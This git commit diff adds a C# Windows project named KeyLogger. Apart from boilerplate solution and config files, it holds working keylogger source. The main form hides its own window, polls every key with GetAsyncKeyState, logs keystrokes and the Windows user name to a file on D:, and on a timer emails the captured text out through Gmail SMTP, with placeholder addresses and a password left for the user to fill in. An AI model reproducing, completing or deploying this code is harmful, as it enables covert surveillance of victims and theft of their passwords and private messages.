Initial Commit

This commit is contained in:
plane000
2018-04-20 10:15:15 +01:00
parent 49150ccfe4
commit 62101e8e61
2870 changed files with 520122 additions and 0 deletions

View File

@@ -0,0 +1,25 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.27130.2027
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "KeyLogger", "KeyLogger\KeyLogger.csproj", "{56CCCEAD-16AF-457B-8FDF-79B553E0877C}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{56CCCEAD-16AF-457B-8FDF-79B553E0877C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{56CCCEAD-16AF-457B-8FDF-79B553E0877C}.Debug|Any CPU.Build.0 = Debug|Any CPU
{56CCCEAD-16AF-457B-8FDF-79B553E0877C}.Release|Any CPU.ActiveCfg = Release|Any CPU
{56CCCEAD-16AF-457B-8FDF-79B553E0877C}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {B5848FC7-5087-4C35-AD9C-87DC18036440}
EndGlobalSection
EndGlobal

View File

@@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.1" />
</startup>
</configuration>

View File

@@ -0,0 +1,52 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{56CCCEAD-16AF-457B-8FDF-79B553E0877C}</ProjectGuid>
<OutputType>Exe</OutputType>
<RootNamespace>KeyLogger</RootNamespace>
<AssemblyName>KeyLogger</AssemblyName>
<TargetFrameworkVersion>v4.6.1</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<None Include="App.config" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

View File

@@ -0,0 +1,3 @@
internal class Keys
{
}

View File

@@ -0,0 +1,390 @@
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
//
using System.Runtime.InteropServices;
using System.IO;
using System.Net.Mail;
using System.Net;
namespace Keylogger1
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}
[DllImport("User32.dll")]
private static extern short GetAsyncKeyState(System.Windows.Forms.Keys vKey);
[DllImport("User32.dll")]
private static extern short GetAsyncKeyState(System.Int32 vKey);
StringBuilder keyBuffer;
string data = "";
void CreateLog(string file)
{
try
{
StreamWriter sw = new StreamWriter(file, true);//I used true to append log to file
sw.Write(keyBuffer.ToString());
sw.Write(data.ToString());
sw.Close();
keyBuffer.Clear(); // reset buffer
}
catch
{
}
}
private void button1_Click(object sender, EventArgs e)
{
this.Opacity = 0;
key.Enabled = true;
log.Enabled = true;
notifyIcon1.ShowBalloonTip(5000);
button2.Enabled = true;
button1.Enabled = false;
}
private void notifyIcon1_MouseDoubleClick(object sender, MouseEventArgs e)
{
this.Opacity = 0;
}
string msg = "";
bool capslock, numlock;
private void key_Tick(object sender, EventArgs e)
{
capslock = Console.CapsLock;
numlock = Console.NumberLock;
if (capslock == true)
{
//button1.Text = "On";
}
foreach (System.Int32 i in Enum.GetValues(typeof(Keys))) //Iterate through each key to know whether it was pressed or not
{
if (GetAsyncKeyState(i) == -32767) //-32767(minimum value) indicates that key was pressed since we last called this function
{
msg = Enum.GetName(typeof(Keys), i).ToString();
if (capslock == true)
{
msg = msg.ToUpper();
}
else
msg = msg.ToLower();
switch (msg)
{
case "space":
case "SPACE":
msg = " ";
break;
case "capslock":
case "CAPSLOCK":
msg = " ";
break;
// shiftkeylshiftkey
case "enter":
case "ENTER":
msg = (Environment.NewLine);
break;
case "LBUTTON":
case "lbutton":
msg = "";
break;
case "OemPeriod":
case "OEMPERIOD":
case "oemperiod":
msg = ".";
break;
case "LMenu":
case "lemnu":
case "LMENU":
msg = "ALT ";
break;
case "Back":
msg = " ";
break;
case "Oem7":
msg = "'";
break;
case "down":
msg = " D ";
break;
case "up":
msg = " U ";
break;
case "right":
msg = " R ";
break;
case "left":
msg = " L ";
break;
case "back":
msg = " B ";
break;
case "Oemcomma":
msg = ",";
break;
case "Capital":
msg = "CAPITAL ";
break;
case "Tab":
msg = "TAB ";
break;
case "OemQuestion":
msg = "?";
break;
case "Oem1":
msg = ";";
break;
case "Oem5":
msg = "\\";
break;
case "Oem6":
msg = "]";
break;
case "OemOpenBrackets":
msg = "[";
break;
case "OemMinus":
msg = "-";
break;
case "Oemplus":
msg = "+";
break;
/*case Keys.Down:
sw.Write("DownArrow-");
break;
case Keys.Left:
sw.Write("Left Arrow-");
break;
case Keys.Right:
sw.Write("Righr Arrow-");
break;
case Keys.Up:
sw.Write("Up Arrow-");
break;*/
case "D0":
case "d0":
msg = "0";
break;
case "D1":
case "d1":
msg = "1";
break;
case "D2":
case "d2":
msg = "2";
break;
case "D3":
case "d3":
msg = "3";
break;
case "D4":
case "d4":
msg = "4";
break;
case "D5":
case "d5":
msg = "5";
break;
case "D6":
case "d6":
msg = "6";
break;
case "D7":
case "d7":
msg = "7";
break;
case "D8":
case "d8":
msg = "8";
break;
case "D9":
case "d9":
msg = "9";
break;
case "OemPipe":
msg = "|";
break;
case "rshiftkey":
case "RShiftKey":
case "RSHIFTKEY":
msg = "";
break;
case "LSHIFTKEY":
case "Lshiftkey":
case "lshiftkey":
msg = "";
break;
case "LCONTROLKEY":
case "lcontrolkey":
msg = "";
break;
case "RCONTROLKEY":
case "rcontrolkey":
msg = "";
break;
case "OemSemicolon":
msg = ";";
break;
case "DELETE":
case "delete":
msg = "";
break;
//case "DELETE":
//case "delete":
// msg = "";
//break;
}
if (msg.Contains("control") || msg.Contains("CONTROL")) try { msg = msg.Substring("CONTROL".Length, msg.Length); ctrl = 2; }
catch { msg = ""; ctrl = 2; }
if (msg.Contains("shift") || msg.Contains("SHIFT")) try { msg = msg.Substring("SHIFT".Length, msg.Length); shift = 3; }
catch { msg = ""; shift = 3; }
if (msg.Equals("delete") || msg.Equals("DELETE")) del = 2;
if (msg.Equals("back") || msg.Equals("BACK")) back = 3;
if (shift == 1)
{
try
{
a = Convert.ToChar(msg);
shift = 0;
}
catch { }
if (capslock == true)
{
sp = Convert.ToInt32(a) + 32;
try { ab = Convert.ToChar(sp); }
catch { MessageBox.Show(sp.ToString()); }
msg = ab.ToString(); shift = 0;
}
else
{
msg = msg.ToString().ToUpper();
sp = Convert.ToInt32(a) - 32;
try { ab = Convert.ToChar(sp); }
catch { MessageBox.Show(sp.ToString()); }
msg = ab.ToString(); shift = 0;
}
label1.Text = shift.ToString() + " " + msg.ToString();
richTextBox1.Text += msg;
shift = 0;
}
else
{
if (shift >= 2) shift--;
keyBuffer.Append(msg);
label1.Text = shift.ToString() + " " + msg.ToString();
richTextBox1.Text += msg;
}
}
}
}
int ctrl, shift, del, back = 0; int sp; string msg2; char a, ab;
private void Form1_Load(object sender, EventArgs e)
{
this.Opacity = 0;
key.Enabled = true;
log.Enabled = true;
notifyIcon1.ShowBalloonTip(5000);
button2.Enabled = true;
button1.Enabled = false;
string userName = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
richTextBox1.Text += userName + " : ";
keyBuffer = new StringBuilder();
smtpClient = "smtp.gmail.com";
smtpPort = "587";
mailfrom = "YOUR-EMAIL-1@gmail.com"; //ONLY GMAIL ALLOWED
}
string smtpClient, smtpPort, mailfrom;
public void sendMail1()
{
try
{
MailMessage mail = new MailMessage();
mail.From = new MailAddress(mailfrom);
mail.To.Add(new MailAddress("YOUR-EMAIL-WHERE-YOU-WANT-TO-RECEIVE-@anyMail.com"));
mail.Body = richTextBox1.Text;
SmtpClient Smtp_Client = new SmtpClient("smtp.gmail.com", 587);
Smtp_Client.EnableSsl = true;
Smtp_Client.Credentials = new NetworkCredential(mailfrom, "YOUR-EMAIL-1-PASSWORD"); ;
Smtp_Client.SendCompleted += new SendCompletedEventHandler(smtp_SendCompleted);
Smtp_Client.SendAsync(mail, null);
}
catch (Exception ex)
{
MessageBox.Show(ex.ToString());
}
}
private void smtp_SendCompleted(object sender, System.ComponentModel.AsyncCompletedEventArgs e)
{
if (e.Error != null) { }
else if (e.Cancelled) { }
else
{ }
}
private void sendMail()
{
try
{
SmtpClient client = new SmtpClient(smtpClient);
MailMessage message = new MailMessage(mailfrom, "YOUR-EMAIL-1@gmail.com");
message.Body = richTextBox1.Text;
message.Subject = "Keylogger";
client.Credentials = new System.Net.NetworkCredential(mailfrom, "YOUR-EMAIL-1-PASSWORD");
client.Port = Convert.ToInt32(smtpPort);
client.Send(message);
}
catch (Exception ex)
{
}
}
private void log_Tick(object sender, EventArgs e)
{
CreateLog(@"D:\logfilebest.txt");
}
private void button2_Click(object sender, EventArgs e)
{
key.Enabled = false;
log.Enabled = false;
button1.Enabled = true;
button2.Enabled = false;
}
private void timer1_Tick(object sender, EventArgs e)
{
sendMail1();
}
private void button3_Click(object sender, EventArgs e)
{
sendMail1();
}
}
}

View File

@@ -0,0 +1,36 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("KeyLogger")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("KeyLogger")]
[assembly: AssemblyCopyright("Copyright © 2018")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("56cccead-16af-457b-8fdf-79b553e0877c")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]